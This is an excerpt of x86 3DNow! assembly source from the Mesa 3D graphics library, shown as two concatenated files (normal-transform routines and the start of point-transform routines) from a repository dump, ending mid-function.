MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
CMP_L ( CONST(0), EBP ) /* count > 0 ?? */
JE ( LLBL (G3TNNR_end) )
FEMMS
MOVD ( M(0), MM0 ) /* | m0 */
PUNPCKLDQ ( M(5), MM0 ) /* m5 | m0 */
MOVD ( M(10), MM2 ) /* | m10 */
PUNPCKLDQ ( MM2, MM2 ) /* m10 | m10 */
CMP_L ( CONST(0), EDI ) /* lengths == 0 ? */
JNE ( LLBL (G3TNNR_scale_end ) )
MOVD ( ARG_SCALE, MM7 ) /* | scale */
PUNPCKLDQ ( MM7, MM7 ) /* scale | scale */
PFMUL ( MM7, MM0 ) /* scale * m5 | scale * m0 */
PFMUL ( MM7, MM2 ) /* scale * m10 | scale * m10 */
ALIGNTEXT32
LLBL (G3TNNR_scale_end):
CMP_L ( CONST(0), EDI ) /* lengths == 0 ? */
JE ( LLBL (G3TNNR_norm) ) /* need to calculate lengths */
MOVD ( REGIND(EDI), MM3 ) /* | length (x) */
ALIGNTEXT32
LLBL (G3TNNR_norm_w_lengths): /* use precalculated lengths */
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM6 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM7 ) /* | x2 */
PFMUL ( MM0, MM6 ) /* x1*m5 | x0*m0 */
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
PFMUL ( MM2, MM7 ) /* | x2*m10 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM3, MM7 ) /* | x2 (normalized) */
PUNPCKLDQ ( MM3, MM3 ) /* length (x) | length (x) */
ADD_L ( CONST(4), EDI ) /* next length */
PFMUL ( MM3, MM6 ) /* x1 (normalized) | x0 (normalized) */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
MOVQ ( MM6, REGOFF(-16, EAX) ) /* write r0, r1 */
MOVD ( MM7, REGOFF(-8, EAX) ) /* write r2 */
MOVD ( REGIND(EDI), MM3 ) /* | length (x) */
JNZ ( LLBL (G3TNNR_norm_w_lengths) )
JMP ( LLBL (G3TNNR_exit_3dnow) )
ALIGNTEXT32
LLBL (G3TNNR_norm): /* need to calculate lengths */
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM6 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM7 ) /* | x2 */
PFMUL ( MM0, MM6 ) /* x1*m5 | x0*m0 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM2, MM7 ) /* | x2*m10 */
MOVQ ( MM6, MM3 ) /* x1 (transformed)| x0 (transformed) */
MOVQ ( MM7, MM4 ) /* | x2 (transformed) */
PFMUL ( MM6, MM3 ) /* x1*x1 | x0*x0 */
PFMUL ( MM7, MM4 ) /* | x2*x2 */
PFACC ( MM3, MM3 ) /* **not used** | x0*x0+x1*x1 */
PFADD ( MM4, MM3 ) /* | x0*x0+x1*x1+x2*x2*/
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
PFRSQRT ( MM3, MM5 ) /* 1/sqrt (x0*x0+x1*x1+x2*x2) */
MOVQ ( MM5, MM4 )
PUNPCKLDQ ( MM3, MM3 )
PFMUL ( MM5, MM5 )
PFRSQIT1 ( MM3, MM5 )
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
PFRCPIT2 ( MM4, MM5 )
PFMUL ( MM5, MM6 ) /* x1 (normalized) | x0 (normalized) */
MOVQ ( MM6, REGOFF(-16, EAX) ) /* write r0, r1 */
PFMUL ( MM5, MM7 ) /* | x2 (normalized) */
MOVD ( MM7, REGOFF(-8, EAX) ) /* write r2 */
JNZ ( LLBL (G3TNNR_norm) )
LLBL (G3TNNR_exit_3dnow):
FEMMS
LLBL (G3TNNR_end):
POP_L ( EBP )
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
GLOBL GLNAME(_mesa_3dnow_transform_rescale_normals_no_rot)
HIDDEN(_mesa_3dnow_transform_rescale_normals_no_rot)
GLNAME(_mesa_3dnow_transform_rescale_normals_no_rot):
#undef FRAME_OFFSET
#define FRAME_OFFSET 12
PUSH_L ( EDI )
PUSH_L ( ESI )
PUSH_L ( EBP )
MOV_L ( ARG_IN, EAX )
MOV_L ( ARG_DEST, EDX )
MOV_L ( REGOFF(V4F_COUNT, EAX), EBP ) /* dest->count = in->count */
MOV_L ( EBP, REGOFF(V4F_COUNT, EDX) )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
MOV_L ( REGOFF(V4F_START, EDX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
CMP_L ( CONST(0), EBP )
JE ( LLBL (G3TRNR_end) )
FEMMS
MOVD ( ARG_SCALE, MM6 ) /* | scale */
PUNPCKLDQ ( MM6, MM6 ) /* scale | scale */
MOVD ( REGIND(ECX), MM0 ) /* | m0 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m5 | m0 */
PFMUL ( MM6, MM0 ) /* scale*m5 | scale*m0 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m10 */
PFMUL ( MM6, MM2 ) /* | scale*m10 */
ALIGNTEXT32
LLBL (G3TRNR_rescale):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM4 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM5 ) /* | x2 */
PFMUL ( MM0, MM4 ) /* x1*m5 | x0*m0 */
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
PFMUL ( MM2, MM5 ) /* | x2*m10 */
ADD_L ( CONST(16), EAX ) /* next r */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
MOVQ ( MM4, REGOFF(-16, EAX) ) /* write r0, r1 */
MOVD ( MM5, REGOFF(-8, EAX) ) /* write r2 */
JNZ ( LLBL (G3TRNR_rescale) ) /* cnt > 0 ? -> process next normal */
FEMMS
LLBL (G3TRNR_end):
POP_L ( EBP )
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
GLOBL GLNAME(_mesa_3dnow_transform_rescale_normals)
HIDDEN(_mesa_3dnow_transform_rescale_normals)
GLNAME(_mesa_3dnow_transform_rescale_normals):
#undef FRAME_OFFSET
#define FRAME_OFFSET 8
PUSH_L ( EDI )
PUSH_L ( ESI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EDI ) /* dest->count = in->count */
MOV_L ( EDI, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
CMP_L ( CONST(0), EDI )
JE ( LLBL (G3TR_end) )
FEMMS
MOVQ ( REGIND(ECX), MM3 ) /* m1 | m0 */
MOVQ ( REGOFF(16,ECX), MM4 ) /* m5 | m4 */
MOVD ( ARG_SCALE, MM0 ) /* scale */
MOVD ( REGOFF(8,ECX), MM5 ) /* | m2 */
PUNPCKLDQ ( MM0, MM0 ) /* scale | scale */
PUNPCKLDQ ( REGOFF(24, ECX), MM5 )
PFMUL ( MM0, MM3 ) /* scale*m1 | scale*m0 */
MOVQ ( REGOFF(32, ECX), MM6 ) /* m9 | m8*/
PFMUL ( MM0, MM4 ) /* scale*m5 | scale*m4 */
MOVD ( REGOFF(40, ECX), MM7 ) /* | m10 */
PFMUL ( MM0, MM5 ) /* scale*m6 | scale*m2 */
PFMUL ( MM0, MM6 ) /* scale*m9 | scale*m8 */
PFMUL ( MM0, MM7 ) /* | scale*m10 */
ALIGNTEXT32
LLBL (G3TR_rescale):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM2 ) /* | x2 */
MOVQ ( MM0, MM1 ) /* x1 | x0 */
PUNPCKLDQ ( MM2, MM2 ) /* x2 | x2 */
PFMUL ( MM3, MM0 ) /* x1*m1 | x0*m0 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM4, MM1 ) /* x1*m5 | x0*m4 */
PFACC ( MM1, MM0 ) /* x0*m4+x1*m5 | x0*m0+x1*m1 */
MOVQ ( REGIND(EDX), MM1 ) /* x1 | x0 */
PFMUL ( MM5, MM2 ) /* x2*m6 | x2*m2 */
PFADD ( MM2, MM0 ) /* x0*m4...+x2*m6| x0*m0+x1*m1+x2*m2 */
MOVD ( REGOFF(8, EDX), MM2 ) /* | x2 */
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write r0, r1 */
PFMUL ( MM6, MM1 ) /* x1*m9 | x0*m8 */
PFMUL ( MM7, MM2 ) /* | x2*m10 */
PFACC ( MM1, MM1 ) /* *not used* | x0*m8+x1*m9 */
PFADD ( MM2, MM1 ) /* *not used* | x0*m8+x1*m9+x2*m10 */
MOVD ( MM1, REGOFF(-8, EAX) ) /* write r2 */
SUB_L ( CONST(1), EDI ) /* decrement normal counter */
JNZ ( LLBL (G3TR_rescale) )
FEMMS
LLBL (G3TR_end):
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
GLOBL GLNAME(_mesa_3dnow_transform_normals_no_rot)
HIDDEN(_mesa_3dnow_transform_normals_no_rot)
GLNAME(_mesa_3dnow_transform_normals_no_rot):
#undef FRAME_OFFSET
#define FRAME_OFFSET 8
PUSH_L ( EDI )
PUSH_L ( ESI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EDI ) /* dest->count = in->count */
MOV_L ( EDI, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
CMP_L ( CONST(0), EDI )
JE ( LLBL (G3TNR_end) )
FEMMS
MOVD ( REGIND(ECX), MM0 ) /* | m0 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m5 | m0 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m10 */
PUNPCKLDQ ( MM2, MM2 ) /* m10 | m10 */
ALIGNTEXT32
LLBL (G3TNR_transform):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM4 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM5 ) /* | x2 */
PFMUL ( MM0, MM4 ) /* x1*m5 | x0*m0 */
ADD_L ( STRIDE, EDX) /* next normal */
PREFETCH ( REGIND(EDX) )
PFMUL ( MM2, MM5 ) /* | x2*m10 */
ADD_L ( CONST(16), EAX ) /* next r */
SUB_L ( CONST(1), EDI ) /* decrement normal counter */
MOVQ ( MM4, REGOFF(-16, EAX) ) /* write r0, r1 */
MOVD ( MM5, REGOFF(-8, EAX) ) /* write r2 */
JNZ ( LLBL (G3TNR_transform) )
FEMMS
LLBL (G3TNR_end):
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
GLOBL GLNAME(_mesa_3dnow_transform_normals)
HIDDEN(_mesa_3dnow_transform_normals)
GLNAME(_mesa_3dnow_transform_normals):
#undef FRAME_OFFSET
#define FRAME_OFFSET 8
PUSH_L ( EDI )
PUSH_L ( ESI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( ARG_MAT, ECX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EDI ) /* dest->count = in->count */
MOV_L ( EDI, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), EDX ) /* in->start */
MOV_L ( REGOFF(MATRIX_INV, ECX), ECX ) /* mat->inv */
CMP_L ( CONST(0), EDI ) /* count > 0 ?? */
JE ( LLBL (G3T_end) )
FEMMS
MOVQ ( REGIND(ECX), MM3 ) /* m1 | m0 */
MOVQ ( REGOFF(16, ECX), MM4 ) /* m5 | m4 */
MOVD ( REGOFF(8, ECX), MM5 ) /* | m2 */
PUNPCKLDQ ( REGOFF(24, ECX), MM5 ) /* m6 | m2 */
MOVQ ( REGOFF(32, ECX), MM6 ) /* m9 | m8 */
MOVD ( REGOFF(40, ECX), MM7 ) /* | m10 */
ALIGNTEXT32
LLBL (G3T_transform):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(EDX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EDX), MM2 ) /* | x2 */
MOVQ ( MM0, MM1 ) /* x1 | x0 */
PUNPCKLDQ ( MM2, MM2 ) /* x2 | x2 */
PFMUL ( MM3, MM0 ) /* x1*m1 | x0*m0 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM4, MM1 ) /* x1*m5 | x0*m4 */
PFACC ( MM1, MM0 ) /* x0*m4+x1*m5 | x0*m0+x1*m1 */
PFMUL ( MM5, MM2 ) /* x2*m6 | x2*m2 */
PFADD ( MM2, MM0 ) /* x0*m4...+x2*m6| x0*m0+x1*m1+x2*m2 */
MOVQ ( REGIND(EDX), MM1 ) /* x1 | x0 */
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write r0, r1 */
PFMUL ( MM6, MM1 ) /* x1*m9 | x0*m8 */
MOVD ( REGOFF(8, EDX), MM2 ) /* | x2 */
PFMUL ( MM7, MM2 ) /* | x2*m10 */
ADD_L ( STRIDE, EDX ) /* next normal */
PREFETCH ( REGIND(EDX) )
PFACC ( MM1, MM1 ) /* *not used* | x0*m8+x1*m9 */
PFADD ( MM2, MM1 ) /* *not used* | x0*m8+x1*m9+x2*m10 */
MOVD ( MM1, REGOFF(-8, EAX) ) /* write r2 */
SUB_L ( CONST(1), EDI ) /* decrement normal counter */
JNZ ( LLBL (G3T_transform) )
FEMMS
LLBL (G3T_end):
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
GLOBL GLNAME(_mesa_3dnow_normalize_normals)
HIDDEN(_mesa_3dnow_normalize_normals)
GLNAME(_mesa_3dnow_normalize_normals):
#undef FRAME_OFFSET
#define FRAME_OFFSET 12
PUSH_L ( EDI )
PUSH_L ( ESI )
PUSH_L ( EBP )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EBP ) /* dest->count = in->count */
MOV_L ( EBP, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), ECX ) /* in->start */
MOV_L ( ARG_LENGTHS, EDX )
CMP_L ( CONST(0), EBP ) /* count > 0 ?? */
JE ( LLBL (G3N_end) )
FEMMS
CMP_L ( CONST(0), EDX ) /* lengths == 0 ? */
JE ( LLBL (G3N_norm2) ) /* calculate lengths */
ALIGNTEXT32
LLBL (G3N_norm1): /* use precalculated lengths */
PREFETCH ( REGIND(EAX) )
MOVQ ( REGIND(ECX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, ECX), MM1 ) /* | x2 */
MOVD ( REGIND(EDX), MM3 ) /* | length (x) */
PFMUL ( MM3, MM1 ) /* | x2 (normalized) */
PUNPCKLDQ ( MM3, MM3 ) /* length (x) | length (x) */
ADD_L ( STRIDE, ECX ) /* next normal */
PREFETCH ( REGIND(ECX) )
PFMUL ( MM3, MM0 ) /* x1 (normalized) | x0 (normalized) */
MOVQ ( MM0, REGIND(EAX) ) /* write new x0, x1 */
MOVD ( MM1, REGOFF(8, EAX) ) /* write new x2 */
ADD_L ( CONST(16), EAX ) /* next r */
ADD_L ( CONST(4), EDX ) /* next length */
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
JNZ ( LLBL (G3N_norm1) )
JMP ( LLBL (G3N_end1) )
ALIGNTEXT32
LLBL (G3N_norm2): /* need to calculate lengths */
PREFETCHW ( REGIND(EAX) )
PREFETCH ( REGIND(ECX) )
MOVQ ( REGIND(ECX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, ECX), MM1 ) /* | x2 */
MOVQ ( MM0, MM3 ) /* x1 | x0 */
ADD_L ( STRIDE, ECX ) /* next normal */
PFMUL ( MM0, MM3 ) /* x1*x1 | x0*x0 */
MOVQ ( MM1, MM4 ) /* | x2 */
ADD_L ( CONST(16), EAX ) /* next r */
PFMUL ( MM1, MM4 ) /* | x2*x2 */
PFADD ( MM4, MM3 ) /* | x0*x0+x2*x2 */
PFACC ( MM3, MM3 ) /* x0*x0+...+x2*x2 | x0*x0+x1*x1+x2*x2*/
PFRSQRT ( MM3, MM5 ) /* 1/sqrt (x0*x0+x1*x1+x2*x2) */
MOVQ ( MM5, MM4 )
PUNPCKLDQ ( MM3, MM3 )
PFMUL ( MM5, MM5 )
PFRSQIT1 ( MM3, MM5 )
SUB_L ( CONST(1), EBP ) /* decrement normal counter */
PFRCPIT2 ( MM4, MM5 )
PFMUL ( MM5, MM0 ) /* x1 (normalized) | x0 (normalized) */
MOVQ ( MM0, REGOFF(-16, EAX) ) /* write new x0, x1 */
PFMUL ( MM5, MM1 ) /* | x2 (normalized) */
MOVD ( MM1, REGOFF(-8, EAX) ) /* write new x2 */
JNZ ( LLBL (G3N_norm2) )
LLBL (G3N_end1):
FEMMS
LLBL (G3N_end):
POP_L ( EBP )
POP_L ( ESI )
POP_L ( EDI )
RET
ALIGNTEXT16
GLOBL GLNAME(_mesa_3dnow_rescale_normals)
HIDDEN(_mesa_3dnow_rescale_normals)
GLNAME(_mesa_3dnow_rescale_normals):
#undef FRAME_OFFSET
#define FRAME_OFFSET 8
PUSH_L ( EDI )
PUSH_L ( ESI )
MOV_L ( ARG_IN, ESI )
MOV_L ( ARG_DEST, EAX )
MOV_L ( REGOFF(V4F_COUNT, ESI), EDX ) /* dest->count = in->count */
MOV_L ( EDX, REGOFF(V4F_COUNT, EAX) )
MOV_L ( REGOFF(V4F_START, EAX), EAX ) /* dest->start */
MOV_L ( REGOFF(V4F_START, ESI), ECX ) /* in->start */
CMP_L ( CONST(0), EDX )
JE ( LLBL (G3R_end) )
FEMMS
MOVD ( ARG_SCALE, MM0 ) /* scale */
PUNPCKLDQ ( MM0, MM0 )
ALIGNTEXT32
LLBL (G3R_rescale):
PREFETCHW ( REGIND(EAX) )
MOVQ ( REGIND(ECX), MM1 ) /* x1 | x0 */
MOVD ( REGOFF(8, ECX), MM2 ) /* | x2 */
PFMUL ( MM0, MM1 ) /* x1*scale | x0*scale */
ADD_L ( STRIDE, ECX ) /* next normal */
PREFETCH ( REGIND(ECX) )
PFMUL ( MM0, MM2 ) /* | x2*scale */
ADD_L ( CONST(16), EAX ) /* next r */
MOVQ ( MM1, REGOFF(-16, EAX) ) /* write r0, r1 */
MOVD ( MM2, REGOFF(-8, EAX) ) /* write r2 */
SUB_L ( CONST(1), EDX ) /* decrement normal counter */
JNZ ( LLBL (G3R_rescale) )
FEMMS
LLBL (G3R_end):
POP_L ( ESI )
POP_L ( EDI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 13,765
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_xform1.S
|
/* $Id: 3dnow_xform1.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 4
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_general )
HIDDEN(_mesa_3dnow_transform_points1_general)
GLNAME( _mesa_3dnow_transform_points1_general ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPGR_3 ) )
MOVQ ( REGIND(ECX), MM0 ) /* m01 | m00 */
MOVQ ( REGOFF(8, ECX), MM1 ) /* m03 | m02 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
MOVQ ( REGOFF(56, ECX), MM3 ) /* m33 | m32 */
ALIGNTEXT16
LLBL( G3TPGR_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
PUNPCKLDQ ( MM4, MM4 ) /* x0 | x0 */
MOVQ ( MM4, MM5 ) /* x0 | x0 */
PFMUL ( MM0, MM4 ) /* x0*m01 | x0*m00 */
PFMUL ( MM1, MM5 ) /* x0*m03 | x0*m02 */
PFADD ( MM2, MM4 ) /* x0*m01+m31 | x0*m00+m30 */
PFADD ( MM3, MM5 ) /* x0*m03+m33 | x0*m02+m32 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( MM5, REGOFF(8, EDX) ) /* write r3, r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPGR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPGR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_identity )
HIDDEN(_mesa_3dnow_transform_points1_identity)
GLNAME( _mesa_3dnow_transform_points1_identity ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(1), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_1), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPIR_4) )
ALIGNTEXT16
LLBL( G3TPIR_3 ):
MOVD ( REGIND(EAX), MM0 ) /* | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
MOVD ( MM0, REGIND(EDX) ) /* | r0 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPIR_3 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPIR_4 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_3d_no_rot )
HIDDEN(_mesa_3dnow_transform_points1_3d_no_rot)
GLNAME( _mesa_3dnow_transform_points1_3d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3NRR_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TP3NRR_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
PFMUL ( MM0, MM4 ) /* | x0*m00 */
PFADD ( MM2, MM4 ) /* m31 | x0*m00+m30 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVD ( MM3, REGOFF(8, EDX) ) /* write r2 */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3NRR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_perspective )
HIDDEN(_mesa_3dnow_transform_points1_perspective)
GLNAME( _mesa_3dnow_transform_points1_perspective ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPPR_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TPPR_2 ):
MOVD ( REGIND(EAX), MM4 ) /* 0 | x0 */
PFMUL ( MM0, MM4 ) /* 0 | x0*m00 */
MOVQ ( MM4, REGIND(EDX) ) /* write r1, r0 */
MOVQ ( MM3, REGOFF(8, EDX) ) /* write r2 (=m32), r3 (=0) */
ADD_L ( EDI, EAX ) /* next vertex */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPPR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPPR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points1_2d )
HIDDEN(_mesa_3dnow_transform_points1_2d)
GLNAME( _mesa_3dnow_transform_points1_2d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(2), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(4, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2R_3 ) )
MOVQ ( REGIND(ECX), MM0 ) /* m01 | m00 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2R_2 ):
MOVD ( REGIND(EAX), MM4 ) /* | x0 */
